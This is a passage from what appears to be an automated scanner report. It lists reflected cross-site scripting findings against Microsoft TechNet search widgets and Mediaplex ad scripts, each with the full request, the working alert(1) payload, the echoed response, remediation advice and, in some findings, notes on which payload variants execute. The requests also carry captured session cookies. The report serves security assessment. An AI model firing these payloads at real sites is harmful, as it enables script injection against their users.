archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&1c423<img src=a onerror=alert(1)>f43eef14872=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.35. http://i2.services.social.microsoft.com/Search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /Search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b5871<img%20src%3da%20onerror%3dalert(1)>d631634abc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5871<img src=a onerror=alert(1)>d631634abc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Technet&loc=en-US&resref=71&addEnglish=&rn=&rq=&watermark=Forefront&focusOnInit=False&beta=0&iroot=forefront&cver=1864.870%0d%0a&b5871<img%20src%3da%20onerror%3dalert(1)>d631634abc6=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://social.technet.microsoft.com/Forums/en-us/category/forefront
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=ccc32296-e228-4717-9770-f152ea499ab9&Microsoft.CreationDate=07/18/2011 19:42:23&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.NumberOfVisits=2&SessionCookie.Id=D3F156FE5E59413ECF79695756E37873; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=66&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=a7c04ce3fe1745ba9d34f1cfc103b2a7; ADS=SN=175A21EF; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311007849522:ss=1311004920058; msdn=L=1033

Response

HTTP/1.1 200 OK
ntCoent-Length: 12995
Content-Type: application/x-javascript
ETag: ed09f2fad214cfa1a72fa599ad55a881
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12995
Cache-Control: public, max-age=43200
Expires: Tue, 19 Jul 2011 08:13:14 GMT
Date: Mon, 18 Jul 2011 20:13:14 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
"allowEmptySearch":false,"appId":"2","boxId":"SearchTextBox","btnId":"SearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&refinement=71&beta=0&b5871<img src=a onerror=alert(1)>d631634abc6=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US\/forefront","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":
...[SNIP]...

3.36. http://i4.services.social.microsoft.com/Search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /Search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 75386<img%20src%3da%20onerror%3dalert(1)>e6fccf2eac0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75386<img src=a onerror=alert(1)>e6fccf2eac0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

One caveat before taking the "Certain" rating at face value: look at where the echo lands in the response below. It sits inside the double-quoted "queryParams" string of a JSON object, in a file served with Content-Type: application/x-javascript. When that file is loaded through a <script src> tag, an <img> element inside a string literal is inert, and a browser does not render the file as HTML if it is opened directly. What this probe proves is that < and > pass through unencoded; whether a double quote or a backslash also passes through, which is what would be needed to leave the string literal and run code in the script context, is not tested here and should be confirmed before the finding is reported as exploitable.

Request

GET /Search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Technet&loc=en-US&resref=19&addEnglish=&rn=&rq=&watermark=Exchange&focusOnInit=False&beta=0&iroot=exchange&cver=1864.870%0d%0a&75386<img%20src%3da%20onerror%3dalert(1)>e6fccf2eac0=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://social.technet.microsoft.com/forums/en-US/exchangesvrsecuremessaging/threads/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=ccc32296-e228-4717-9770-f152ea499ab9&Microsoft.CreationDate=07/18/2011 19:42:23&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.NumberOfVisits=2&SessionCookie.Id=D3F156FE5E59413ECF79695756E37873; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=66&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=a7c04ce3fe1745ba9d34f1cfc103b2a7; ADS=SN=175A21EF; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311007849522:ss=1311004920058; msdn=L=1033

Response

HTTP/1.1 200 OK
ntCoent-Length: 12993
Content-Type: application/x-javascript
ETag: c904dacd640cacf6b557b5aaac55a85b
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12993
Cache-Control: public, max-age=43199
Expires: Tue, 19 Jul 2011 08:14:37 GMT
Date: Mon, 18 Jul 2011 20:14:38 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
"allowEmptySearch":false,"appId":"2","boxId":"SearchTextBox","btnId":"SearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&refinement=19&beta=0&75386<img src=a onerror=alert(1)>e6fccf2eac0=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US\/exchange","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"
...[SNIP]...

3.37. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_300x250_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b918'%3balert(1)//60364513c23 was submitted in the mpck parameter. This input was echoed as 1b918';alert(1)//60364513c23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value has to be encoded for the JavaScript string-literal context at the moment it is written into the script (for example, every character outside [A-Za-z0-9] as \xHH or \uHHHH). The encodeURIComponent() calls wrapped around the value in the responses of the following issues do not help: they run only after the browser has parsed the script, by which time an unescaped quote in the value has already ended the literal.

Request

GET /content/0/16228/131652/Lumension_IWL_300x250_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D78201111221b918'%3balert(1)//60364513c23&mpt=7820111122&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:50:36 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:27 GMT
ETag: "594d3d-f89-4a67a34afccc0"
Accept-Ranges: bytes
Content-Length: 4317
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-1?mpt=78201111221b918';alert(1)//60364513c23" target="_blank">
...[SNIP]...

3.38. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_300x250_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba7d1"-alert(1)-"f80be01d7ee was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The subtraction form of the probe is the one to reproduce with: in the response below, encodeURIComponent("...ba7d1"-alert(1)-"f80be01d7ee") is still a syntactically valid call, parsed as "...ba7d1" - alert(1) - "f80be01d7ee", so alert(1) runs as soon as the script is evaluated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_300x250_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122ba7d1"-alert(1)-"f80be01d7ee&mpt=7820111122&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:50:29 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:27 GMT
ETag: "594d3d-f89-4a67a34afccc0"
Accept-Ranges: bytes
Content-Length: 4311
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122ba7d1"-alert(1)-"f80be01d7ee");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122ba7d1"-alert(1)-"f80be01d7ee");
mpck =
...[SNIP]...

3.39. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_300x250_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27b45"%3balert(1)//46612244006 was submitted in the mpvc parameter. This input was echoed as 27b45";alert(1)//46612244006 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. A caveat for reproduction: in the response below the value is echoed inside a call, encodeURIComponent("27b45";alert(1)//46612244006"), so this particular probe leaves the parenthesis unbalanced and the script as served fails to parse instead of executing alert(1). The sink is no less real; a probe that keeps the expression well-formed, such as the "-alert(1)-" form shown against mpck in 3.38, demonstrates execution.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_300x250_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122&mpt=7820111122&mpvc=27b45"%3balert(1)//46612244006 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:50:42 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:27 GMT
ETag: "594d3d-f89-4a67a34afccc0"
Accept-Ranges: bytes
Content-Length: 4313
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("27b45";alert(1)//46612244006");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("27b45";alert(1)//46612244006");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("27b45"%3balert(1)//46612244006");
...[SNIP]...

3.40. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_300x250_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0cdf'%3balert(1)//bc66d7f5ce2 was submitted in the mpvc parameter. This input was echoed as f0cdf';alert(1)//bc66d7f5ce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_300x250_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122&mpt=7820111122&mpvc=f0cdf'%3balert(1)//bc66d7f5ce2 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:50:57 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:27 GMT
ETag: "594d3d-f89-4a67a34afccc0"
Accept-Ranges: bytes
Content-Length: 4313
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="f0cdf';alert(1)//bc66d7f5ce2http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-1?mpt=7820111122" target="_blank">
...[SNIP]...

3.41. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fbc6'%3balert(1)//86a610e272d was submitted in the mpck parameter. This input was echoed as 5fbc6';alert(1)//86a610e272d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D78201111125fbc6'%3balert(1)//86a610e272d&mpt=7820111112&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:57:02 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "594d41-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4307
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-0?mpt=78201111125fbc6';alert(1)//86a610e272d" target="_blank">
...[SNIP]...

3.42. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58cc3"-alert(1)-"dde3f81bfbe was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As in 3.38, the subtraction form keeps the surrounding expression valid: encodeURIComponent("...58cc3"-alert(1)-"dde3f81bfbe") in the response below parses as "...58cc3" - alert(1) - "dde3f81bfbe", so alert(1) runs when the script is evaluated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D782011111258cc3"-alert(1)-"dde3f81bfbe&mpt=7820111112&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:56:58 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "594d41-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4301
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D782011111258cc3"-alert(1)-"dde3f81bfbe");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D782011111258cc3"-alert(1)-"dde3f81bfbe");
mpck =
...[SNIP]...

3.43. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e48d"%3balert(1)//72ddadbc4e8 was submitted in the mpvc parameter. This input was echoed as 1e48d";alert(1)//72ddadbc4e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The same caveat as in 3.39 applies: the echo sits inside encodeURIComponent("1e48d";alert(1)//72ddadbc4e8"), so this probe leaves the parenthesis unbalanced and the script fails to parse rather than executing alert(1). Use a probe that keeps the expression well-formed, such as the "-alert(1)-" form shown against mpck in 3.42, to demonstrate execution.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=1e48d"%3balert(1)//72ddadbc4e8 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
